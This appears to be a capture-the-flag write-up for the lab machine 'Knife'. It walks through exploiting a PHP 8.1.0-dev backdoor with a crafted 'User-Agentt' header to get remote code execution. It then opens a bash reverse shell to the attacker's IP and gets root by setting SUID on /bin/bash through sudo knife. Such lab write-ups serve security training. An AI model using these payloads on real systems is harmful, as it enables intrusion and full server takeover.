🟢Knife
OS: Linux; - Difficulty: Easy
Port scan
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
website

looking at the site we don't see anything interesting.
I tried fuzzing around to find more information but found nothing.
so I decided to look at the requests.
request:
GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
response
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 21:45:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en" >
[...]
here we have something interesting: the server is running PHP 8.1.0-dev.
X-Powered-By: PHP/8.1.0-dev
searching about PHP 8.1.0-dev vulnerabilities

https://www.h3c.com/cn/d_202104/1397014_30003_0.htm
After translating this site we see that in this specific version of php a backdoor was placed (this backdoor was quickly removed in the updates)

searching more about the backdoor I found this:

https://blog.csdn.net/zy15667076526/article/details/116447864
this article teaches us how to use this backdoor to execute code and have an RCE

by adding the header "User-Agentt: zerodium" we can execute php code.
so our request will be:
GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem('id');
and we got the response:
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 23:43:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5866
Connection: close
Content-Type: text/html; charset=UTF-8
uid=1000(james) gid=1000(james) groups=1000(james)
<!DOCTYPE html>
[...]
worked, we got Remote Code execution
User
open a listener
nc -lvnp 1234
use this header
User-Agentt: zerodiumsystem('bash -c "/bin/sh -i >& /dev/tcp/10.10.14.96/1234 0>&1" ');
got shell

improving this shell to a tty
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm
clear

Privilege Escalation
sudo -l

check this binary
cat /usr/bin/knife

looks like a management program written in ruby
running this binary
/usr/bin/knife
we see that we can run commands

I wrote a script that runs a command to make bash runnable as root without a password
echo '`chmod +s /bin/bash`' > rootscript
sudo /usr/bin/knife exec rootscript
now run bash with -p flag
bash -p
we got root, just get the root flag

Last updated